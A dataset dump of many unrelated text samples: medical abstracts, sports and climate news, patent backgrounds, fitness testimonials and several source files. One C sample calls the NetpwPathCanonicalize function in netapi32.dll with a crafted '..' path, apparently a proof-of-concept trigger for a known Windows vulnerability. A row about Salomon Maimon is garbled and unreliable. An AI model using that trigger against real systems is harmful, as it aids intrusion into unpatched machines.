text
stringlengths 1
3.78M
| meta
dict |
|---|---|
Hydatid disease: a rare cause of adrenal cyst.
A case of hydatid cyst in the adrenal gland is presented. Eight cases have been previously reported. The diagnosis of an adrenal cyst is usually incidental, and the diagnosis of hydatid cyst is seldom made preoperatively. Surgical excision of the gland including the cyst is the treatment of choice.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
5 things you need to know in the sports business: Alibaba eyes Brooklyn Nets and more
Cavaliers revive stadium renovation plans
The Cleveland Cavaliers announced that they will be reviving their plans for a $140 million renovation to their home venue Quicken Loans Arena after the plan was initially scrapped last week. Included in the renovations are plans for the construction of a glass exterior and additional dining spaces, among other improvements. The team also announced they will be extending their lease with the facility for an additional seven years. The contract between the two parties will now run through at least 2034.
Sale of Brooklyn Nets is gaining interest
Earlier this summer, it was reported that Brooklyn Nets majority owner Mikhail Prokhorov was looking to sell a controlling stake in the team. A source close to the owner was quoted saying that there would definitely be a new owner within the next two years, but it looks like something may come to fruition sooner than that.
The team has begun to gather interest from several parties, including one led by Alibaba Executive Vice Chair Joe Tsai. Tsai recently purchased a San Diego NLL team, and there have been rumors of his interest in purchasing the Nets for the last several months. According to Forbes, the Nets are valued at approximately $1.8 billion.
North Carolina close to renewing Nike contract
According to North Carolina athletic director Bubba Cunningham, the university is on the verge of renewing its apparel contract with Nike. He stated that the two sides have been working together on an extension and should have it completed in the next couple of months. The University of North Carolina is one of the brand’s select schools that are outfitted with Jordan brand apparel for basketball season, and just this year the school joined the University of Michigan in also wearing Jordan apparel during football season.
The University of North Carolina is on the verge of renewing its contract with Nike. (Source)
Multiple bids received for renaming of Qualcomm Stadium
A Fox Sports Properties Executive is handling the official bidding for the renaming of former San Diego Chargers home Qualcomm Stadium, and he is apparently pleased with the bids that have been submitted thus far. According to the executive, bids have been placed by “less than 10 companies or institutions,” but he is very pleased with the companies that have come forward.
He declined to identify any of the candidates but said that the public would be happy with whoever ends up winning the rights. The naming rights are only good through the end of 2018 when the city plans to close the stadium.
NBA could change draft lottery process
According to Adrain Wojnarowski of ESPN, the NBA is looking to reform their draft lottery process and could implement changes before the 2019 draft. According to the report, NBA commissioner Adam Silver is a strong advocate of implementing lower odds for the worst finishing teams in the league as a potential solution to the tanking problem that the league has been facing in recent years. A similar solution had been suggested back in 2014, but it did not receive enough support to take effect.
—
DISCLAIMER: This article expresses my own ideas and opinions. Any information I have shared are from sources that I believe to be reliable and accurate. I did not receive any financial compensation in writing this post, nor do I own any shares in any company I’ve mentioned. I encourage any reader to do their own diligent research first before making any investment decisions.
|
{
"pile_set_name": "Pile-CC"
}
|
1. Field of the Invention
This invention relates to craftsman's tools and more particularly to tools designed to produce a straight, smooth edge on a piece of lumber or other material which may have a "crook" or flat bow or rough mill edges.
2. Description of the Prior Art
In working with sheets or boards of raw material, such as wood, plywood, or masonite, there is always an interest in minimizing costs to maximize profits and reduce waste. For instance, in woodworking, one can save substantial amounts of money by purchasing unfinished, rough mill lumber. Sometimes, the desired lumber is only available in unfinished form. Regardless, the raw material needs at least one straight, smooth edge as a reference edge for future shaping and cutting.
Prior art discloses devices or tools developed to take advantage of the lower prices for rough cut lumber, while seeking ways to guarantee straight edges on lumber and other building materials to be used as furniture, cabinets, counter tops, wall boards, paneling, and for many other purposes including, but not limited to, general construction purposes.
In general, these prior art devices include independent clamps of various designs and flat bars which use clamps or screws for attachment to the lumber or other material to be cut.
A typical prior art device comprises two clamps. One end of each clamp is tightened around one edge of a known straight board; the other end is tightened to the bowed board. The unobstructed end of the straight board is then used as the contact surface to a saw fence or guide to make a straight cut along the bowed board. This method requires a constant examination of the straight board to determine any warpness or damage from use and a constant checking of the integrity and tightness of the clamps used to prevent relative movement between the straight and bowed lumber prior to and while sawing.
Other prior art devices include cutting guides usually made of aluminum. Some of these are of fixed length while others can be lengthened for cutting longer pieces of wood, wallboard, masonite, and paneling. These devices attach by clamps to the board being cut. These clamps may be the well-known "C" clamps (screw type). In use, a plurality of "C" clamps are placed around both the guide and the board, and holds them together by frictional forces created by compression across the thickness of the guide and the board.
Alternatively, jaw-type clamps may be used. A plurality of these clamps are typically rigidly attached to the underside of the guide. The jaws then are positioned around the board to be cut across its thickness and are clamped shut by pressing a lever. As with the "C" clamps, the board is held relative to the guide by frictional forces created by compression across the thickness of the board.
All of these prior art devices are very difficult to use with a saw fence due to the interferences caused by clamps protruding to the side or below the surface of the board to be cut. Furthermore, under the intense vibrational forces occurring during sawing often loosen the compression-type hold on the board, resulting in board movement and a non-straight cut along the board.
Thus, there remains a significant need for a tool or saw guide designed to eliminate the flat bow out of rough cut mill lumber of varying lengths or other materials and provide a near perfect saw cut edge while also allowing the use of a standard table saw, radial saw, or circular saw.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Tissue alterations in urethral and vaginal walls related to multiparity in rabbits.
In rodents, vaginal distention after delivery or experimental manipulation affects innervations as well as the amount of striated/smooth musculature or collagen in both the urethra and vagina. These changes are associated with modifications in excretory and reproductive processes. Although successive and consecutive vaginal deliveries (multiparity) affect the contractile and functional properties of the female lower urogenital tract (LUT), its impact on LUT morphometry, including persistency, has been barely studied. The caudal urethra (CU) and cranial (V1) and caudal (V2) pelvic vaginal regions were excised from young and adult nulliparous (YN and AN, respectively) and multiparous (YM and AM, respectively) rabbits. Tissues were histologically processed and stained with Masson's trichrome. The thickness of the tissue layers and areas covered by tissue components were measured and compared using two-way ANOVA followed by Student-Newmann-Keuls tests to determine statistical differences (P ≤ 0.05). Compared to YN, YM, and AN tissues showed a reduction in the thickness of the epithelium, as well as in areas covered by striated musculature, collagen, and blood vessels of the LUT. In comparison with YM, only some morphometric changes were recovered in the AM group. Our study shows that multiparity and age can be associated with epithelial and muscular atrophy of urethral and vaginal walls. The morphometry of the LUT between young and adult female rabbits varies with multiparity. These findings may help to better understand the effects of multiparity on young and adult females and its correlation with the development of pelvic dysfunctions.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
#include <windows.h>
#include <stdio.h>
typedef int (__stdcall *MYPROC) (LPWSTR, LPWSTR, DWORD,LPWSTR, LPDWORD,DWORD);
int main(int argc, char* argv[])
{
WCHAR path[256];
WCHAR can_path[256];
DWORD type = 1000;
int retval;
HMODULE handle = LoadLibrary(".\\netapi32.dll");
MYPROC Trigger = NULL;
if (NULL == handle)
{
wprintf(L"Fail to load library!\n");
return -1;
}
Trigger = (MYPROC)GetProcAddress(handle, "NetpwPathCanonicalize");
if (NULL == Trigger)
{
FreeLibrary(handle);
wprintf(L"Fail to get api address!\n");
return -1;
}
path[0] = 0;
wcscpy(path, L"\\aaa\\..\\..\\bbbb");
can_path[0] = 0;
type = 1000;
wprintf(L"BEFORE: %s\n", path);
retval = (Trigger)(path, can_path, 1000, NULL, &type, 1);
wprintf(L"AFTER : %s\n", can_path);
wprintf(L"RETVAL: %s(0x%X)\n\n", retval?L"FAIL":L"SUCCESS", retval);
FreeLibrary(handle);
return 0;
}
|
{
"pile_set_name": "Github"
}
|
BenDeLaCreme will certainly go down as one of the most memorable queens in Drag Race herstory. Her initial appearance on the show in Season 6 certainly gave fans much to remember. Not only did she win the title of “Miss Congeniality”, but there was also her memorable turn as Maggie Smith in “Snatch Game”; the fact that when she landed in the bottom two, RuPaul performed the rare trick of saving both queens — specifically noting a desire to see more from DeLa; and of course her often uncanny resemblance to Drag Race judge Michelle Visage.
It’s worth remembering that Visage called DeLa out during that season, critiquing that she didn’t feel like she’d gotten a sense of the queen’s identity. DeLa was hurt at the time, defending the BenDeLaCreme character as the embodiment of everything that she was. In retrospect, perhaps it wasn’t that we hadn’t gotten to know the character but that we hadn’t gotten to know the difference between her two characters. Where did realness of drag performer Benjamin Putnam end and the airy Mary sweetness of the DeLa character begin?
Between Season 6 and her return on All Stars 3, each seemed to click into sharper focus. In talking head interviews as Ben — adorably attired in a purple bow tie and matching Jughead-style hat — he was smart, witty and thoughtful. Meanwhile, in drag, DeLa had become bigger, bouncier, funnier and more versatile than ever. This growth was rewarded with an incredible five main challenge wins and three “Lip Sync for Your Legacy” victories — certainly making her one of the winningest queens to ever compete on Drag Race.
In our exclusive interview, DeLa offers some rare insights about both the frenzied pace of the Race and the intensity of the competition overall. She also makes a thoughtful plea to viewers of Drag Race to watch with kindness that seems prescient considering the recent spate of racially-charged social media hate directed at one of the contestants of color. And though we would have gladly seen her take the All Stars 3 crown, it’s possible that she created an even more memorable moment than winning with her controversial decision to sacrifice herself and send herself home. Regardless, DeLa, you’ll always be a winner to us.
Want Metrosource LGBTQ content notifications? Sign up for MetroEspresso.
drag rupaul rupaul’s drag race tv
Last modified: February 14, 2019
|
{
"pile_set_name": "OpenWebText2"
}
|
Can you imagine reading in the Star-Telegram a headline like "TRWD Planning for $1 Billion Trinity Uptown Vision Project & Public Vote"?
Read the Sound Transit planning heats up for light-rail expansion and public vote article. Make note of how detailed the article is. Make note that the article mentions project timelines. Make note that the article details the issues being faced by Sound Transit prior to putting the $15 Billion project to a public vote. Make note how big the project is, covering three counties, each of which is way bigger than Tarrant County.
In Tarrant County there is no comprehensive public transit covering the entire, small, heavily populated county. Only Fort Worth has any form of public transit, that being a fleet of little buses which run on limited routes and a train which travels to Dallas and back several times a day.
A few days ago Elsie Hotpepper sent me that which you see below, which succinctly sums up how the developed. progressive parts of America and the world view public transportation.
Meanwhile, in Tarrant County, apparently, or so I have been told, most of the locals think only poor people use public transit....
|
{
"pile_set_name": "Pile-CC"
}
|
The OARSI histopathology initiative - recommendations for histological assessments of osteoarthritis in sheep and goats.
Sheep and goats are commonly used large animal species for studying pathogenesis and treatment of osteoarthritis (OA). This review focuses on the macroscopic and microscopic criteria for assessing OA in sheep and goats and recommends particular assessment criteria to assist standardization in the conduct and reporting of preclinical trials of OA. A review was conducted of all published OA studies using sheep and goats and the most common macroscopic, microscopic, or ultrastructural scoring systems were summarised. General recommendations regarding methods of OA assessment in the sheep and goat have been made and a preliminary study of their reliability and utility was undertaken. The modified Mankin scoring system is recommended for semiquantitative histological assessment of OA due to its already widespread adoption, ease of use, similarity to scoring systems used for OA in humans, and its achievable inter-rater reliability. Specific recommendations are also provided for histological scoring of synovitis and scoring of macroscopic lesions of OA. The proposed system for assessment of sheep and goat articular tissues appears to provide a useful versatile method to quantify OA change. It is hoped that by adopting more standardised quantitative outcome measures, better comparison between different studies and arthritis models will be possible. The suggested scoring systems can be modified in the future as our knowledge of disease pathophysiology advances.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Each book has a unique sketch inside! Order the new book by Peter Han, as part of his successful Kickstarter Campaign. Printed on 250 gsm "Tintoretto" Italian paper, it closely resembles the paper Peter used in his original journals. Filled with information, the first half of the book covers organic forms, while the second half delves into the mechanical. Step into Peter's sketchbook, look at his original thought process and read his own handwriting.
|
{
"pile_set_name": "Pile-CC"
}
|
1. Field of the Invention
This invention relates to a method of hydroformylating olefinic compounds. More particularly, the invention relates to a method of hydroformylating an olefinic compound into the corresponding aldehyde in an organic solvent and in the presence of a rhodium complex and a trisubstituted phosphine, there being added to the reaction system at least one diphosphino compound of general formula (I) ##STR3## wherein A.sup.1 and A.sup.2, respectively, are aryl groups; R.sup.1 and R.sup.2, respectively, are an aryl group or a saturated hydrocarbon residue of 1 or more carbon atoms; and ##STR4## represents a substituted or unsubstituted alicyclic hydrocarbon group of 3 to 6 carbon atoms in the main ring, in a proportion of 0.20 to 5.0 equivalents per rhodium atom in said rhodium complex to thereby achieve a substantial prolongation of catalyst activity and, consequently, achieve a more advantageous hydroformylation of the olefinic compound.
2. Description of the Prior Art
There is known a hydroformylation reaction in which an olefin, exemplified by ethylene, propylene and butene, is reacted with a gaseous hydrogen-carbon monoxide mixture in an organic solvent and in the presence of a rhodium complex and a trisubstituted phosphine to obtain an aldehyde containing one more carbon atom than the starting olefin. The reaction has been commercially utilized, for example, in the production of butyraldehyde from propylene.
The rhodium complex as used for catalyzing the hydroformylation reaction is suited for industrial practice in that it helps perform the reaction under considerably milder conditions (lower temperature and pressure) than does a cobalt catalyst and that it contributes to a higher selectivity for normal-aldehyde. However, since the rhodium complex is quite expensive, the industrial value of a hydroformylation reaction with this complex depends largely on the catalyst life of the complex. Therefore, much research has heretofore been done and many proposals made in connection with means of maintaining the activity of the catalyst for an extended time under hydroformylating conditions. These methods may be roughly classified into three categories:
(1) A method in which the contemplated reaction is carried out while various reaction conditions such as the concentrations of the rhodium catalyst and trisubstituted phosphine, the partial pressure of carbon monoxide and the reaction temperature are controlled, each within a defined range, so as to suppress thermal degradation of the rhodium complex and formation of an inactive highly-carbonylated rhodium complex, e.g. see, German Patent Application (abbreviated as DTOS) 2,715,685;
(2) A method in which a small amount of oxygen is allowed to be present in the reaction system, e.g. see, DTOS 2,730,527; ;P (3) A method in which the reaction is carried out while the concentration of poisonous high-boiling byproducts in the reaction system is maintained below a certain level, e.g., see British Pat. No. 1,338,237 and British Pat. No. 1,545,706.
These hitherto-proposed methods, however, have room for improvement when industrial applications are envisaged. The first method (1) is commercially disadvantageous in that any drop in reaction temperature and any increase in concentration of the trisubstituted phosphine result in a reduced reaction rate which would require use of the expensive rhodium catalyst in an increased concentration in order to compensate for the reduction of reaction rate. With respect to the second method (2), the trisubstituted phosphine and the end product aldehyde are unstable against oxygen and tend to be converted to the substituted phosphine oxide and organic carboxylic acid, respectively, with the result that not only is the catalyst activity reduced but there are induced undesirable secondary reactions of the product aldehyde. The third method (3) is disadvantageous in that maintaining the concentration of high-boiling byproducts acting as catalyst poisons below a certain level is industrially equivalent to frequent regeneration, activation and recovery of the rhodium catalyst which are, of necessity, accompanied by losses of the rhodium catalyst and trisubstituted phosphine. Even by the above methods, a depression of catalyst activity is frequently encountered during the reaction and it has been inevitable to carry out the regeneration, activation and recovery of the rhodium catalyst with a fair frequency. This not only means a complicated procedure but also entails losses of the rhodium catalyst and trisubstituted phosphine in the regeneration step. Thus, the conventional methods for maintaining the activity of the rhodium catalyst leave much room for improvement.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Electronic messaging systems, such as email, Instant Messenger, and social networking sites, are commonly used for communication both within and outside the workplace. Generally, a user composes an electronic message with information to be received and reviewed by a recipient. The electronic message received by the recipient can be stored, replied to, or forwarded to other recipients, which can result in the addition or deletion of content and recipients. Thus, organization, sharing, and distribution of the information through the electronic messaging systems can be overwhelming and difficult to manage due to the changing environment.
Current electronic messaging systems offer keyword searches to identify electronic messages. However, keyword searches are limited since the keyword must be included in the content of the electronic message and users often have no control over the content if they are recipients of the electronic message. Commonly, the electronic messaging systems also provide a list or “address book” of potential recipients for addressing electronic messages for delivery. However, the list fails to identify which recipients are interested in receiving electronic messages regarding a particular subject matter and a user may be unable to determine the appropriate recipients or obtain email address for the appropriate recipient.
Content tagging systems are available to organize electronic information gathered by users using tags. The tags are assigned to a piece of electronic info and can describe a topic or content of the info, which allows users to easily find the tagged information through a tag search. Conventional tagging systems include Delicious and Diigo. However, use of the current tagging systems can be impractical and burdensome due to the need to incorporate a separate system into a user's daily routine. For example, each user client must be installed with the tagging system and registered with the appropriate server. Thus, the tagging systems are not easily incorporated. Also, the tagging systems fail to generate and maintain associations between tags, electronic information, and users.
Further, content sharing systems, such as wiki workplaces and boundaryless organizations, emphasize group collaboration with user interest being broadcast and user participation changing over time. However, the dynamics of the content sharing systems are often difficult to manage due to the constantly changing environment and fail to address generating and maintaining groups of users based on interest in particular subject matter.
Thus, a system and method for unobtrusively integrating content tagging and distribution with existing communication structures and services is needed.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Recommender engine for continuous-time quantum Monte Carlo methods.
Recommender systems play an essential role in the modern business world. They recommend favorable items such as books, movies, and search queries to users based on their past preferences. Applying similar ideas and techniques to Monte Carlo simulations of physical systems boosts their efficiency without sacrificing accuracy. Exploiting the quantum to classical mapping inherent in the continuous-time quantum Monte Carlo methods, we construct a classical molecular gas model to reproduce the quantum distributions. We then utilize powerful molecular simulation techniques to propose efficient quantum Monte Carlo updates. The recommender engine approach provides a general way to speed up the quantum impurity solvers.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.stratos.python.cartridge.agent.integration.tests;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.stratos.common.domain.LoadBalancingIPType;
import org.apache.stratos.messaging.domain.topology.*;
import org.apache.stratos.messaging.event.instance.notifier.ArtifactUpdatedEvent;
import org.apache.stratos.messaging.event.topology.CompleteTopologyEvent;
import org.apache.stratos.messaging.event.topology.MemberInitializedEvent;
import org.testng.annotations.AfterMethod;
import org.testng.annotations.BeforeMethod;
import org.testng.annotations.Test;
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;
import java.util.Properties;
/**
* To test the agent termination flow by terminator.txt file
*/
public class AgentTerminationTestCase extends PythonAgentIntegrationTest {
public AgentTerminationTestCase() throws IOException {
}
@Override
protected String getClassName() {
return this.getClass().getSimpleName();
}
private static final Log log = LogFactory.getLog(AgentTerminationTestCase.class);
private static final int TIMEOUT = 300000;
private static final String CLUSTER_ID = "tomcat.domain";
private static final String APPLICATION_PATH = "/tmp/AgentTerminationTestCase";
private static final String DEPLOYMENT_POLICY_NAME = "deployment-policy-6";
private static final String AUTOSCALING_POLICY_NAME = "autoscaling-policy-6";
private static final String APP_ID = "application-6";
private static final String MEMBER_ID = "tomcat.member-1";
private static final String INSTANCE_ID = "instance-1";
private static final String CLUSTER_INSTANCE_ID = "cluster-1-instance-1";
private static final String NETWORK_PARTITION_ID = "network-partition-1";
private static final String PARTITION_ID = "partition-1";
private static final String TENANT_ID = "6";
private static final String SERVICE_NAME = "tomcat";
@BeforeMethod(alwaysRun = true)
public void setup() throws Exception {
System.setProperty("jndi.properties.dir", getCommonResourcesPath());
super.setup(TIMEOUT);
startServerSocket(8080);
}
@AfterMethod(alwaysRun = true)
public void tearDownAgentTerminationTest(){
tearDown(APPLICATION_PATH);
}
@Test(groups = {"smoke"})
public void testAgentTerminationByFile() throws IOException {
startCommunicatorThread();
assertAgentActivation();
sleep(5000);
String terminatorFilePath = agentPath + PATH_SEP + "terminator.txt";
log.info("Writing termination flag to " + terminatorFilePath);
File terminatorFile = new File(terminatorFilePath);
String msg = "true";
Files.write(Paths.get(terminatorFile.getAbsolutePath()), msg.getBytes());
log.info("Waiting until agent reads termination flag");
sleep(50000);
List<String> outputLines = new ArrayList<>();
boolean exit = false;
while (!exit) {
List<String> newLines = getNewLines(outputLines, outputStream.toString());
if (newLines.size() > 0) {
for (String line : newLines) {
if (line.contains("Shutting down Stratos cartridge agent...")) {
log.info("Cartridge agent shutdown successfully");
exit = true;
}
}
}
sleep(1000);
}
}
private void assertAgentActivation() {
Thread startupTestThread = new Thread(new Runnable() {
@Override
public void run() {
while (!eventReceiverInitialized) {
sleep(1000);
}
List<String> outputLines = new ArrayList<>();
while (!outputStream.isClosed()) {
List<String> newLines = getNewLines(outputLines, outputStream.toString());
if (newLines.size() > 0) {
for (String line : newLines) {
if (line.contains("Subscribed to 'topology/#'")) {
sleep(2000);
// Send complete topology event
log.info("Publishing complete topology event...");
Topology topology = PythonAgentIntegrationTest.createTestTopology(
SERVICE_NAME,
CLUSTER_ID,
DEPLOYMENT_POLICY_NAME,
AUTOSCALING_POLICY_NAME,
APP_ID,
MEMBER_ID,
CLUSTER_INSTANCE_ID,
NETWORK_PARTITION_ID,
PARTITION_ID,
ServiceType.SingleTenant);
CompleteTopologyEvent completeTopologyEvent = new CompleteTopologyEvent(topology);
publishEvent(completeTopologyEvent);
log.info("Complete topology event published");
// Publish member initialized event
log.info("Publishing member initialized event...");
MemberInitializedEvent memberInitializedEvent = new MemberInitializedEvent(SERVICE_NAME,
CLUSTER_ID, CLUSTER_INSTANCE_ID, MEMBER_ID, NETWORK_PARTITION_ID, PARTITION_ID,
INSTANCE_ID);
publishEvent(memberInitializedEvent);
log.info("Member initialized event published");
}
// Send artifact updated event to activate the instance first
if (line.contains("Artifact repository found")) {
publishEvent(getArtifactUpdatedEventForPrivateRepo());
log.info("Artifact updated event published");
}
}
}
sleep(1000);
}
}
});
startupTestThread.start();
while (!instanceStarted || !instanceActivated) {
// wait until the instance activated event is received.
// this will assert whether instance got activated within timeout period; no need for explicit assertions
sleep(2000);
}
}
public static ArtifactUpdatedEvent getArtifactUpdatedEventForPrivateRepo() {
ArtifactUpdatedEvent privateRepoEvent = createTestArtifactUpdatedEvent();
privateRepoEvent.setRepoURL("https://bitbucket.org/testapache2211/testrepo.git");
privateRepoEvent.setRepoUserName("testapache2211");
privateRepoEvent.setRepoPassword("iF7qT+BKKPE3PGV1TeDsJA==");
return privateRepoEvent;
}
private static ArtifactUpdatedEvent createTestArtifactUpdatedEvent() {
ArtifactUpdatedEvent artifactUpdatedEvent = new ArtifactUpdatedEvent();
artifactUpdatedEvent.setClusterId(CLUSTER_ID);
artifactUpdatedEvent.setTenantId(TENANT_ID);
return artifactUpdatedEvent;
}
}
|
{
"pile_set_name": "Github"
}
|
Immunization Recommendations for Pediatric Patients with Chronic Kidney Disease, Nephrotic Syndrome, and Renal Transplants: A Literature Review and Quality Improvement Project.
Pediatric patients with chronic kidney disease (CKD) have an increased risk of developing vaccine-preventable diseases due to reduced immunization coverage. Studies have demonstrated that reduced immunization coverage in this population is related to barriers, such as frequent hospitalization, lack of knowledge, and concerns about safety and efficacy. This article examines a nurse practitioner-led quality improvement project (QIP) conducted in an outpatient pediatric nephrology clinic. The QIP focused on educating pediatric providers related to age-appropriate immunizations for children with CKD or nephrotic syndrome, and those who are renal transplant candidates and recipients. A process is now in place to review immunization records upon initial visit and annually, and to notify primary care providers of current recommendations for this population.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Murray, 1888); Wolff, Maimoniana( 1813); Witte, S. The ebook Steaming to of the deliberate Wikipedia vor meets numerous under the Creative Commons Evolutionary gewinnen. The Full Wiki as the term on the law intuitive justification with a site only to this list with no eigentliche die. equations 2 to 13 Die only associated in this davor. Christian Wolff y Moses Mendelssohn.
Cambridge, MA: Harvard University Press, 1987. The figure of Salomon Maimon. Jerusalem: Magnes Press, 1967. The interpretation of Thought: Maimonian Skepticism and the reverse between Thoughts and Objects.
|
{
"pile_set_name": "Pile-CC"
}
|
<?php
/**
* This file is part of the Carbon package.
*
* (c) Brian Nesbitt <brian@nesbot.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
return require __DIR__.'/et.php';
|
{
"pile_set_name": "Github"
}
|
#ifndef _PART_DRIVER_H
#define _PART_DRIVER_H 1
int part_connect(mass_dev* dev);
void part_disconnect(mass_dev* dev);
#endif
|
{
"pile_set_name": "Github"
}
|
A novel variant of Gh_D02G0276 is required for root-knot nematode resistance on chromosome 14 (D02) in Upland cotton.
MAGIC population sequencing and virus-induced gene silencing identify Gh_D02G0276 as a novel root-knot nematode resistance gene on chromosome 14 in Upland cotton. The southern root-knot nematode [RKN; Meloidogyne incognita (Kofoid & White)] remains the primary yield-limiting biotic stress to Upland cotton (Gossypium hirsutum L.) throughout the southeastern USA. While useful genetic markers have been developed for two major RKN resistance loci on chromosomes 11 (A11) and 14 (D02), these markers are not completely effective because the causative genes have not been identified. Here, we sequenced 550 recombinant inbred lines (RILs) from a multi-parent advanced generation intercross (MAGIC) population to identify five RILs that had informative recombinations near the D02-RKN resistance locus. The RKN resistance phenotypes of these five RILs narrowed the D02-RKN locus to a 30-kb region with four candidate genes. We conducted virus-induced gene silencing (VIGS) on each of these genes and found that Gh_D02G0276 was required for suppression of RKN egg production conferred by the Chr. D02 resistance gene. The resistant lines all possessed an allele of Gh_D02G0276 that showed non-synonymous mutations and was prematurely truncated. Furthermore, a Gh_D02G0276-specific marker for the resistance allele variant was able to identify RKN-resistant germplasm from a collection of 367 cotton accessions. The Gh_D02G0276 peptide shares similarity with domesticated hAT-like transposases with additional novel N- and C-terminal domains that resemble the target of known RKN effector molecules and a prokaryotic motif, respectively. The truncation in the resistance allele results in a loss of a plant nuclear gene-specific C-terminal motif, potentially rendering this domain antigenic due to its high homology with bacterial proteins. The conclusive identification of this RKN resistance gene opens new avenues for understanding plant resistance mechanisms to RKN as well as opportunities to develop more efficient marker-assisted selection in cotton breeding programs.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
There is nowhere else on the planet right now where the dichotomy between two potential futures – one where we address the climate change crisis, one where we ignore this momentous threat and continue with business as usual – is playing out in such a dramatic and explosive way as Australia.
In the US, Donald Trump is decimating decades of hard-fought environmental and climate standards – it’s all 18th century all the time. But the ageing fossil fuel assets and recent “market failure” of the Australian electricity grid is pushing political leaders to all-out brawling, pitting conservative inaction against the demand for solution-focused action.
A recent wave of blackouts and near misses and the proposal of the biggest coalmine in the world – the Adani Carmichael mine in Queensland – has created tinder-dry conditions that only needed one spark to go up in flames.
The Adani mine is this generation's Franklin River. People power can stop it | Bob Brown Read more
The spark finally came recently, via Twitter, from renewable energy entrepreneur Elon Musk who offered to sell the batteries that would remove the last argument against renewable power.
It turned the deadlocked debate over how to fix Australia’s fossil fuel-ladenand often failing energy “market” into an open war between those backing the dying coal industry with those set on using the moment to transition to renewable energy.
Indeed, one of the icons of the ageing coal fleet, the dirtiest coal power station in the developed world – Hazelwood in Victoria – turns off its turbines this week as it shuts down. The symbols couldn’t be clearer: Musk’s batteries or Adani’s mega-mine and dirty coal power. Which one represents the future?
As you formulate the answer, remember that the war is of course playing out against a tragic backdrop: the ongoing destruction of the Great Barrier Reef that is Australia’s great natural treasure, the thing it’s been charged by the world to protect. That horror is a human-created disaster, caused directly by man-made global warming that is increasing ocean temperatures by an alarming rate.
The decision about the future is also a decision about what kind of democracy you want. As in the US, the Aussie mining industry has for decades has a disproportionate amount of power over politicians. It cares about one thing only – not the greater good, but its own perpetuation.
But now the coal industry is starting to lose its grip. And it won’t necessarily be a slow process. The fractures are running through all stratas of Australian governance: states are closing coal stations and opting for renewable energy and battery storage (a la the Musk Tweet); and companies and businesses that have traditionally been allies of the coal industry are advocating for climate policies that would essentially spell the end of coal-powered energy; individuals and communities in great numbers are breaking free of the grid.
A marooned and thoroughly isolated Malcolm Turnbull is left on the losing side advocating for an industry and a coalmine we all know he doesn’t believe in to appease a small number of rightwingers in his party so he can continue to call himself the prime minister. Without a doubt, he will be swept aside by the arc of change – he who had the chance to lead on the issue of our time but chose to give in to vested interests and the fringe of his party.
As your electricity grid fails and industry holds on to the myth of an ever-growing coal export industry, Australians must draw a line in the sand and decide whether they continue to support coal, or whether the future is renewable.
Backed against the wall, the coal lobby and Turnbull’s fossil fuel-obsessed colleagues have gambled everything on the construction of the Adani coalmine. This mine would be the largest coalmine in history and, if constructed, it would do much to push the planet beyond 2C of warming.
The politics of coal are changing and this mine is that line in the sand.
Last week a historic alliance of environmental groups representing more than 1.5 million people launched the largest climate movement in Australia’s history.
Anti-Adani activists vow 'direct action' against mine contractor Downer Read more
Led by Bob Brown, who I had the honour of meeting last year, the battle to stop Adani is shaping up as the most important environmental fight ever down under, the likes of the Tar Sands battle we’ve seen in North America.
People are engaged and will take action to preserve the climate, the Great Barrier Reef and the rights of the traditional owners whose land will be destroyed by this mine in ways that hasn’t before been seen.
In my many visits there, I have found Australians to be obliging and deeply passionate about protecting their unique environment. Never has the contrast between the fossil fuel present and the clean energy future been in such stark relief. I now implore all Australians to take a stand – for the sake of the world’s climate – to ensure this mine never goes ahead.
|
{
"pile_set_name": "OpenWebText2"
}
|
Success Stories
Have a look at all coaching transformations
words of happiness
Testimonials
My weaknesses have become my strengths, my failures have become my successes and my pain has become my light as I began to know myself better each week of coaching with Amanda. I faced my fears and they went from insurmountable mountains to little hills. For me what meant the most was the heart Amanda showed me. Her guidance and heart pushed my broken spirit into a renewed full of accountability for myself life plan.
— Laura, client
Testimonials
I started working with Amanda to get in shape and feel confident on my wedding day. With a lifetime of fad diets, cleanses, diet pills, low fat, sugar free, you name it, my body was a mess inside and out. Amanda helped me focus on nutrition, I learned how to choose food that nourish my body while working on my mindset.
- Kayla
Working with Amanda was one of the best investments that I have ever made for myself. By changing my diet drastically and stepping inside the gym for the first time, I learned how to properly fuel my body and became empowered to take care of myself. And most importantly, Amanda helped me learn how to make good choices for myself physically, mentally, emotionally and spiritually.
– Stephanie
Amanda has helped me implement lifestyle changes that work for me and my daily life so that I am successful in reaching my goals. I can honestly say that I have never felt better, not only physically, but more importantly, I have learned to love myself for the person that was inside all along.
- Brittany
Being the mother of three small boys, I wasn’t sure I would be able to achieve my goals and still be a great mom to my kids. What I have loved about this process is that Amanda does all of the thinking and planning me. I am amazed I have been able to get the results I have always wanted-all while juggling the demands of family life.
– Kacey
Amanda helped change my life in so many ways I can't begin to sum them all up! I've managed to improve my mental health, strengthen my relationship with my boyfriend and be more confident overall. Thank you, thank you, thank you!
- Keri F
With Amanda I was able to express and share my episodes of frustration and feelings of wanting to give up. She was always there to pick me back up and set me straight. Over the course of my journey to wellness with Amanda, I completely changed my physique and can now comfortably wear a bikini!
- Melanie
